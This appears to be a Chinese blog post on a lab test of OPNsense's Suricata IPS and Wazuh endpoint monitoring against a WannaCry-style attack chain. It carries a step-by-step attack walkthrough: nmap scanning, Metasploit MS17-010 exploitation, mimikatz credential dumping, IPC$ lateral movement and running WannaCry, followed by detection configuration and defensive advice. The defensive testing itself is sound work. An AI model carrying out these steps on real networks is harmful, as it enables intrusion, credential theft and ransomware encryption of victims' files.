注:仅供交流学习使用,请勿用于非法用途
一、引言(背景与挑战)
注意:WannaCry病毒为勒索病毒测试需要在断网情况下在本地测试。
WannaCry病毒攻击链中的横向移动:
简述WannaCry病毒攻击中横向移动的重要性(如窃取凭证、内网渗透、加密关键资产)。
当前检测难点:东/西流量隐蔽性高、合法工具滥用(如PsExec)、加密通信规避检测。
OPNsense + Wazuh 的协同价值:
OPNsense 作为开源防火墙提供 网络层威胁拦截(Suricata IDS/IPS)。
Wazuh 作为 XDR 平台提供 端点行为分析(进程监控、文件完整性、日志关联)。
两者整合实现 网络+终端 的立体化检测。
二、实验环境搭建
1. 组件部署
OPNsense (v25.1):
启用 Suricata IPS 模式,加载规则集(emerging-attack response.rules, emerging-shellcode.rules,emerging-sql.rules,emerging-worm.rules)。
Wazuh Server (v4.12):
代理安装测试终端(Windows/Linux)。
2.Windows主机
Windows都要加入域环境,Windows7开启445端口,Windows10加入wazuh管理安装sysmon把日志传输到wazuh。
三、测试信息
| 攻击机 | 192.168.3.100 | Kali Linux | Metasploit, Nmap |
| OPNsense防火墙 | 192.168.3.144 | 边界防护 | Suricata IPS模式 |
| Wazuh | 192.168.3.139 | Wazuh服务器 | 主机保护及文件检测 |
| Windows10 | 192.168.3.170 | Windows 10 + Wazuh Agent | 加入域,开放445端口 |
| Windows7 | 192.168.3.180 | Windows7 | 跳板机 |
四、测试内容
1.使用kali的nmap工具扫描主机网络及对应的开放端口。
nmap -sT 192.168.3.0/24
2.发现主机开放了445端口,使用kali的metasploit进行漏洞利用
列出永恒之蓝的漏洞利用模块:search MS17-010
使用Windows7攻击模块:use2
配置开放445的IP,然后启动
set rhosts 192.168.3.180
run
使用ipconfig检查是否获得主机控制
把Windows7开启远程控制使用fscan进行内网主机漏洞扫描
.\fascan.exe -h 192.168.3.0/24
OPNsense在服务-入侵检测-管理-警报中检测到大量可疑攻击流量
使用mimikatz获得用户的明文账号密码
以管理员身份运行程序
获取权限:privilege::debug
#抓取密码:sekurlsa::logonpasswords
使用ipc$连接域内用户,IPC$默认开放的逻辑共享
net use \\ip\ipc$ “密码”/user:用户名
连接成功后可以打开域用户文件,上传WannaCry勒索病毒
解压WannaCry病毒后运行WannaCry.exe,测试的文件夹立即多出WannaCry病毒附带文件,并且把所有文件加密乱码。
Wazuh在配置文件下新增文件检测规则,检测WannaCry病毒对文件的加密修改。
C:\Program Files (x86)\ossec-agent\ossec.conf
<directories check_all="yes" report_changes="yes" realtime="yes">C:\admin\</directories>
Wazuh后台可以检测到WannaCry病毒加密方式及新增wncry文件。
五、总结与防御建议
1. 测试核心结论
OPNsense + Wazuh 协同防御有效性:
OPNsense 的 Suricata IPS 成功拦截了网络层攻击(如永恒之蓝漏洞利用、横向扫描流量),验证了边界防护的关键作用。
Wazuh 通过端点行为监控(文件完整性检查、进程审计)实时检测到勒索病毒加密行为,并触发告警,体现了“网络+终端”联动的必要性。
勒索病毒攻击链关键点:
攻击者利用 弱口令+未修复漏洞(如MS17-010) 突破边界,通过 内网横向移动(IPC$共享、凭证窃取) 扩散,最终加密核心资产。
防御短板:若未部署终端检测(如Wazuh),加密行为可能无法被及时发现。
2. 企业级防御建议
立即行动项:
网络层:启用 OPNsense Suricata IPS,定期更新规则集(重点关注勒索软件相关规则)。
终端层:部署 Wazuh 代理并配置文件完整性监控(FIM),覆盖关键目录(如共享文件夹)。
漏洞管理:定期扫描内网漏洞(尤其SMB、RDP服务),及时修补高危漏洞(如MS17-010)。
权限管控:限制域用户默认共享权限(如IPC$),实施最小权限原则。
进阶措施:
启用 Wazuh 的 Sysmon 集成,增强进程创建、网络连接等行为的日志记录。
结合 零信任架构,对内部流量实施动态访问控制(如OPNsense的SSL/TLS解密检查)。
六、延伸思考与互动
“90%的勒索攻击始于边界漏洞”——你的企业是否做好了以下准备?
是否已禁用老旧协议(如SMBv1)?
能否在1小时内检测到异常文件加密行为?
📌 关注我,了解更多实战防御指南。
“安全是持续的过程,而非一次性配置。” 点击关注 ↓ ,共同构建更健壮的防御体系!
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
